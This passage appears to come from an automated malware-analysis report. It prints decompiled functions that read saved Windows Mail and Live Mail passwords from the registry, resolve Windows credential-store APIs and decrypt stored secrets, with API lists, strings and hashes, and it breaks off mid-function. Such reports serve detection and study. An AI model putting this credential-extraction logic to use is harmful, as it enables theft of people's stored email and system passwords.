				_t100 = __edx;
				_t93 = __eax;
				E004046D7( &_v1080);
				if(E004047A0( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L004115D0();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406512( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L004115D6();
				}
				return E004047F1( &_v1080);
			}































                                                                        0x00410525
                                                                        0x00410525
                                                                        0x00410536
                                                                        0x00410538
                                                                        0x00410544
                                                                        0x0041054c
                                                                        0x00410551
                                                                        0x00410556
                                                                        0x00410558
                                                                        0x00410558
                                                                        0x0041055c
                                                                        0x00410562
                                                                        0x00410566
                                                                        0x00410567
                                                                        0x0041056a
                                                                        0x0041056c
                                                                        0x0041056f
                                                                        0x00410576
                                                                        0x0041057d
                                                                        0x00410581
                                                                        0x00410587
                                                                        0x0041058a
                                                                        0x0041058d
                                                                        0x0041058e
                                                                        0x0041056c
                                                                        0x004105a1
                                                                        0x004105a8
                                                                        0x004105bc
                                                                        0x004105bf
                                                                        0x004105c5
                                                                        0x004105cd
                                                                        0x004105d9
                                                                        0x004105e2
                                                                        0x004105e5
                                                                        0x004105e7
                                                                        0x00000000
                                                                        0x004105e7
                                                                        0x004105db
                                                                        0x004105db
                                                                        0x004105ec
                                                                        0x004105f3
                                                                        0x004105f9
                                                                        0x004105f9
                                                                        0x00410614
                                                                        0x00410629
                                                                        0x0041062c
                                                                        0x00410637
                                                                        0x00410637
                                                                        0x00410640
                                                                        0x00410646
                                                                        0x0041064f
                                                                        0x00410664
                                                                        0x0041066e
                                                                        0x00410670
                                                                        0x00410688
                                                                        0x00410693
                                                                        0x0041069d
                                                                        0x0041069d
                                                                        0x004106a3
                                                                        0x004106a6
                                                                        0x004106ac
                                                                        0x004106bb

                                                                        APIs
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • strlen.MSVCRT ref: 0041054C
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                        • memset.MSVCRT ref: 004105A8
                                                                        • memset.MSVCRT ref: 004105C5
                                                                        • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                        • LocalFree.KERNEL32(?), ref: 0041069D
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                          • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                        Strings
                                                                        • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                        • Salt, xrefs: 00410621
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                        • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                        • API String ID: 1673043434-2687544566
                                                                        • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                        • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                                        • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                        • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040D6FB, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 56%
                                                                        			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				int _v8;
				int _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				int _v44;
				void _v299;
				char _v300;
				char _v556;
				char _v812;
				char _v4908;
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E004118A0(0x132c, __ecx);
				_t84 = 0;
				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);
				_push(0xff);
				_push( &_v300);
				_v8 = 0;
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;
							_v28 =  &_v4908;
							_v40 = _a12;
							_v36 = _a8;
							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060D0(0xff, _t85,  &_v300);
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
								 *((intOrPtr*)( *_a4))(_t85);
								LocalFree(_v20);
								_t84 = 0;
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}























                                                                        0x0040d703
                                                                        0x0040d71a
                                                                        0x0040d725
                                                                        0x0040d729
                                                                        0x0040d862
                                                                        0x0040d862
                                                                        0x0040d735
                                                                        0x0040d743
                                                                        0x0040d74b
                                                                        0x0040d752
                                                                        0x0040d753
                                                                        0x0040d756
                                                                        0x0040d844
                                                                        0x0040d774
                                                                        0x0040d792
                                                                        0x0040d7a1
                                                                        0x0040d7aa
                                                                        0x0040d7b3
                                                                        0x0040d7b9
                                                                        0x0040d7bf
                                                                        0x0040d7db
                                                                        0x0040d7e4
                                                                        0x0040d7ea
                                                                        0x0040d7f1
                                                                        0x0040d7f8
                                                                        0x0040d812
                                                                        0x0040d820
                                                                        0x0040d825
                                                                        0x0040d82b
                                                                        0x0040d82b
                                                                        0x0040d7db
                                                                        0x0040d830
                                                                        0x0040d830
                                                                        0x0040d836
                                                                        0x0040d839
                                                                        0x0040d840
                                                                        0x0040d841
                                                                        0x0040d841
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                        • memset.MSVCRT ref: 0040D743
                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                        • LocalFree.KERNEL32(?), ref: 0040D825
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                        • API String ID: 551151806-1288872324
                                                                        • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                        • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                        • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                        • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004080A3, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 56%
                                                                        			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E004118A0(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x417488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4172c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407E55(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00407FEB, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4172c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4171b4 =  *0x4171b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00407EFB(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}











                                                                        0x004080a3
                                                                        0x004080a3
                                                                        0x004080ab
                                                                        0x004080b0
                                                                        0x004080b5
                                                                        0x004080fb
                                                                        0x004080ff
                                                                        0x00408105
                                                                        0x0040810e
                                                                        0x00408110
                                                                        0x00408126
                                                                        0x00408126
                                                                        0x00408134
                                                                        0x00408155
                                                                        0x0040815f
                                                                        0x00408165
                                                                        0x00408176
                                                                        0x0040817c
                                                                        0x00408182
                                                                        0x00408190
                                                                        0x00408196
                                                                        0x0040819e
                                                                        0x004081a5
                                                                        0x00408112
                                                                        0x00408120
                                                                        0x00408120
                                                                        0x00408122
                                                                        0x00408124
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00408114
                                                                        0x00408117
                                                                        0x0040811d
                                                                        0x0040811d
                                                                        0x00000000
                                                                        0x0040811d
                                                                        0x00000000
                                                                        0x00408117
                                                                        0x00000000
                                                                        0x00408120
                                                                        0x004081ac
                                                                        0x004081ac
                                                                        0x004080b7
                                                                        0x004080c4
                                                                        0x004080d2
                                                                        0x004080d8
                                                                        0x004080df
                                                                        0x004080e1
                                                                        0x004080e3
                                                                        0x004080e4
                                                                        0x004080e7
                                                                        0x004080f0
                                                                        0x004080f0
                                                                        0x004081b2

                                                                        APIs
                                                                        • sprintf.MSVCRT ref: 004080C4
                                                                        • LoadMenuA.USER32 ref: 004080D2
                                                                          • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                          • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                          • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                          • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                        • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                        • sprintf.MSVCRT ref: 00408134
                                                                        • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                        • memset.MSVCRT ref: 00408165
                                                                        • GetWindowTextA.USER32 ref: 00408176
                                                                        • EnumChildWindows.USER32 ref: 0040819E
                                                                        • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                        • String ID: caption$dialog_%d$menu_%d
                                                                        • API String ID: 3259144588-3822380221
                                                                        • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                        • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                        • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                        • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E056, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040E056() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x417514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x416fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x416fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x416fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x416e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x416fcc = _t2;
								if(_t2 != 0) {
									 *0x417514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                        0x0040e05d
                                                                        0x0040e0d9
                                                                        0x0040e0d9
                                                                        0x0040e065
                                                                        0x0040e06b
                                                                        0x0040e06f
                                                                        0x0040e0d8
                                                                        0x00000000
                                                                        0x0040e0d8
                                                                        0x0040e07e
                                                                        0x0040e082
                                                                        0x0040e087
                                                                        0x0040e08f
                                                                        0x0040e093
                                                                        0x0040e098
                                                                        0x0040e0a0
                                                                        0x0040e0a4
                                                                        0x0040e0a9
                                                                        0x0040e0b1
                                                                        0x0040e0b5
                                                                        0x0040e0ba
                                                                        0x0040e0c2
                                                                        0x0040e0c6
                                                                        0x0040e0cb
                                                                        0x0040e0cd
                                                                        0x0040e0cd
                                                                        0x0040e0cb
                                                                        0x0040e0ba
                                                                        0x0040e0a9
                                                                        0x0040e098
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                        • API String ID: 667068680-3953557276
                                                                        • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                        • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                        • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                        • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404647, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046C2(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046C2(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}






                                                                        0x00404648
                                                                        0x0040464a
                                                                        0x00404654
                                                                        0x0040465c
                                                                        0x0040465e
                                                                        0x00404676
                                                                        0x00404682
                                                                        0x0040468e
                                                                        0x0040469a
                                                                        0x004046a3
                                                                        0x004046a7
                                                                        0x004046b8
                                                                        0x004046af
                                                                        0x004046af
                                                                        0x004046af
                                                                        0x004046a7
                                                                        0x004046c1

                                                                        APIs
                                                                          • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,73AFF420), ref: 004046C9
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                        • API String ID: 2449869053-4258758744
                                                                        • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                        • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                        • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                        • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00411015, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E004118A0(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00410E8A(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BC49( &_v132);
						E0040BC6D(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BD0B( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BC49( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BC6D(_t109,  &_v132);
						E0040BD0B( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BC49(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BC6D(_t122, _t181);
						E0040BD0B( &_v39, _t181,  &_v5348);
						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BC49( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BC6D(_t67,  &_v132, _a12);
						E0040BD0B(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}







































                                                                        0x00411015
                                                                        0x0041101d
                                                                        0x00411025
                                                                        0x00411034
                                                                        0x0041103a
                                                                        0x00411053
                                                                        0x00411056
                                                                        0x00411060
                                                                        0x00411063
                                                                        0x00411069
                                                                        0x0041106b
                                                                        0x00411079
                                                                        0x0041107a
                                                                        0x0041107b
                                                                        0x0041108a
                                                                        0x00411090
                                                                        0x0041109e
                                                                        0x004110a4
                                                                        0x004110b2
                                                                        0x004110b8
                                                                        0x004110bf
                                                                        0x004110c5
                                                                        0x004110c6
                                                                        0x004110c7
                                                                        0x004110c8
                                                                        0x004110cf
                                                                        0x004110d8
                                                                        0x004110de
                                                                        0x004110e6
                                                                        0x004110f4
                                                                        0x00411100
                                                                        0x00411103
                                                                        0x00411115
                                                                        0x0041111f
                                                                        0x0041112a
                                                                        0x0041112d
                                                                        0x00411130
                                                                        0x0041113c
                                                                        0x00411151
                                                                        0x00411163
                                                                        0x0041116a
                                                                        0x00411175
                                                                        0x00411178
                                                                        0x0041117b
                                                                        0x00411187
                                                                        0x004111a6
                                                                        0x004111be
                                                                        0x004111c3
                                                                        0x004111c8
                                                                        0x004111d0
                                                                        0x004111d8
                                                                        0x004111db
                                                                        0x004111dd
                                                                        0x004111f8
                                                                        0x004111fd
                                                                        0x00411203
                                                                        0x00411206
                                                                        0x00411206
                                                                        0x00411209
                                                                        0x0041120d
                                                                        0x0041120f
                                                                        0x00411216
                                                                        0x0041121d
                                                                        0x00411220
                                                                        0x00411220
                                                                        0x0041120f
                                                                        0x00411233
                                                                        0x0041123a
                                                                        0x00411242
                                                                        0x0041124a
                                                                        0x00411250
                                                                        0x0041125c
                                                                        0x0041126b
                                                                        0x0041127d
                                                                        0x00411295
                                                                        0x00411296
                                                                        0x00411296
                                                                        0x0041106b
                                                                        0x0041129e

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041103A
                                                                          • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                        • strlen.MSVCRT ref: 00411056
                                                                        • memset.MSVCRT ref: 00411090
                                                                        • memset.MSVCRT ref: 004110A4
                                                                        • memset.MSVCRT ref: 004110B8
                                                                        • memset.MSVCRT ref: 004110DE
                                                                          • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                          • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                          • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                          • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                          • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                        • memcpy.MSVCRT ref: 00411115
                                                                          • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                          • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                          • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                        • memcpy.MSVCRT ref: 00411151
                                                                        • memcpy.MSVCRT ref: 00411163
                                                                        • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                        • memcpy.MSVCRT ref: 0041126B
                                                                        • memcpy.MSVCRT ref: 0041127D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpymemset$strlen$strcpy
                                                                        • String ID: salu
                                                                        • API String ID: 2660478486-4177317985
                                                                        • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                        • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                        • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                        • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403E87, Relevance: 19.6, APIs: 7, Strings: 6, Instructions: 98stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 81%
                                                                        			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
